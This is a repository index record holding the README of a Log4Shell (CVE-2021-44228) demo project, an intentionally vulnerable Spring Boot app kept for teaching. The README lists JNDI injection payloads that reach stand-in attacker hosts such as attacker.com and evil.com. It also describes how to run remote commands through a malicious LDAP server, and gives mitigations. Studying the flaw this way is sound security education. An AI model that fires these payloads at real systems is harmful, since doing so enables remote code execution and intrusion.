{"id":34910550,"url":"https://github.com/mintimate/log4j2-bugmaker","last_synced_at":"2026-03-17T17:01:55.370Z","repository":{"id":321184474,"uuid":"1084827717","full_name":"Mintimate/log4j2-bugmaker","owner":"Mintimate","description":"Demo of CVE-2021-44228 Log4Shell.","archived":false,"fork":false,"pushed_at":"2025-10-28T08:10:48.000Z","size":18,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-12-27T21:09:54.354Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"HTML","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Mintimate.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-10-28T08:07:49.000Z","updated_at":"2025-10-28T08:10:51.000Z","dependencies_parsed_at":"2025-10-28T10:09:42.018Z","dependency_job_id":"c9aadc07-6d3a-41db-8a1c-47cfba1776cb","html_url":"https://github.com/Mintimate/log4j2-bugmaker","commit_stats":null,"previous_names":["mintimate/log4j2-bugmaker"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/Mintimate/log4j2-bugmaker","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mintimate%2Flog4j2-bugmaker","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mintimate%2Flog4j2-bugmaker/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mintimate%2Flog4j2-bugmaker/releases","manifests_url":"https://repos.ecosys
te.ms/api/v1/hosts/GitHub/repositories/Mintimate%2Flog4j2-bugmaker/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Mintimate","download_url":"https://codeload.github.com/Mintimate/log4j2-bugmaker/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mintimate%2Flog4j2-bugmaker/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30627664,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-17T14:16:03.965Z","status":"ssl_error","status_checked_at":"2026-03-17T14:16:03.380Z","response_time":56,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2025-12-26T11:07:58.634Z","updated_at":"2026-03-17T17:01:55.365Z","avatar_url":"https://github.com/Mintimate.png","language":"HTML","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Log4j2-BugMaker\n\n## CVE-2021-44228 Log4Shell Vulnerability Demo Project\n\nThis is a demo project for learning about and researching the Log4j2 remote code execution vulnerability (Log4Shell).\n\n## ⚠️ Security Warning\n\n**This project is for security research and educational purposes only. Do not use it in a production environment!**\n\nThis project uses Log4j 2.14.1, a version with a critical security vulnerability.\n\n## 📋 Environment\n\n- **Spring Boot**: 2.6.1\n- **Log4j2**: 2.14.1 (vulnerable version)\n- **Java**: 8 (JDK 1.8)\n\n## 🚀 Quick Start\n\n### 1. Build the project\n\n```bash\n./mvnw clean package\n```\n\n### 2. Run the application\n\n```bash\n./mvnw spring-boot:run\n```\n\nOr:\n\n```bash\njava -jar target/log4j2-bugmaker-0.0.1-SNAPSHOT.jar\n```\n\n### 3. 
Access the application\n\nOpen a browser and visit: http://localhost:8080\n\n## 🎯 Vulnerable Endpoints\n\n### 1. User-Agent header injection\n\n```bash\ncurl -H \"User-Agent: \\${jndi:ldap://attacker.com/a}\" http://localhost:8080/api/log\n```\n\n### 2. Query parameter injection\n\n```bash\ncurl \"http://localhost:8080/api/search?query=\\${jndi:ldap://attacker.com/a}\"\n```\n\n### 3. Health check (not vulnerable)\n\n```bash\ncurl http://localhost:8080/api/health\n```\n\n## 💡 How the Vulnerability Works\n\nLog4Shell (CVE-2021-44228) is a critical vulnerability in Apache Log4j2. When an application logs user input that contains a specially formatted string, Log4j2 resolves JNDI lookup expressions, and an attacker can use this behavior to execute remote code.\n\n### Attack payload examples\n\n```\n${jndi:ldap://evil.com/a}\n${jndi:rmi://evil.com/a}\n${jndi:dns://evil.com/a}\n```\n\n### Test payloads (safe)\n\n```\n${java:version}\n${java:os}\n${env:PATH}\n```\n\n## 🔧 Test Steps\n\n1. Start the application\n2. Send a request containing a JNDI expression\n3. Check the console log and observe how Log4j2 resolves the expression\n\n## 🛡️ Fixes\n\n### Option 1: Upgrade Log4j2\n\nUpgrade Log4j2 to 2.17.1 or later:\n\n```xml\n\u003cproperties\u003e\n    \u003clog4j2.version\u003e2.17.1\u003c/log4j2.version\u003e\n\u003c/properties\u003e\n```\n\n### Option 2: Set a JVM parameter\n\n```bash\n-Dlog4j2.formatMsgNoLookups=true\n```\n\n### Option 3: Remove the JndiLookup class\n\n```bash\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\n## 🚀 Remote Code Execution Demo\n\n### Method 1: Use the provided tool (recommended)\n\n```bash\n# 1. Run the automation script\n./setup-exploit-server.sh\n\n# 2. Select the JNDI-Injection-Exploit tool\n# 3. Enter the command to execute (e.g. whoami or cat /etc/hosts)\n# 4. 
Send the attack payload from another terminal\n```\n\n### Method 2: Use the Python LDAP server\n\n```bash\n# Start the malicious LDAP server\npython3 simple-ldap-server.py \"whoami\"\n\n# Or execute another command\npython3 simple-ldap-server.py \"cat /etc/hosts\"\n\n# Send the attack payload from another terminal\ncurl -H 'User-Agent: ${jndi:ldap://YOUR_IP:1389/Exploit}' http://localhost:8080/api/log\n```\n\n### Method 3: DNS out-of-band verification (no server setup required)\n\n```bash\n# Run the DNS out-of-band test script\n./test-dns-exfiltration.sh\n\n# Follow the prompts and visit dnslog.cn to get a subdomain\n# Then check whether a DNS query was received\n```\n\n## 📚 References\n\n- [CVE-2021-44228 details](https://nvd.nist.gov/vuln/detail/CVE-2021-44228)\n- [Apache Log4j security advisories](https://logging.apache.org/log4j/2.x/security.html)\n- [CISA alert](https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-356a)\n- [JNDI-Injection-Exploit](https://github.com/welk1n/JNDI-Injection-Exploit)\n- [JNDIExploit](https://github.com/feihong-cs/JNDIExploit)\n\n## 📝 License\n\nThis project is released under the [MIT License](LICENSE).\n\n**Special notice**: This project is for educational and security research purposes only; users bear the risks of using it themselves.\n\n## ⚠️ Legal Notice\n\nPenetration testing other people's systems without authorization is illegal! This project is only for:\n- Learning in your own test environment\n- Authorized security testing\n- Security research and educational purposes\n\nPlease comply with local laws and regulations and use this knowledge responsibly.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmintimate%2Flog4j2-bugmaker","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmintimate%2Flog4j2-bugmaker","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmintimate%2Flog4j2-bugmaker/lists"}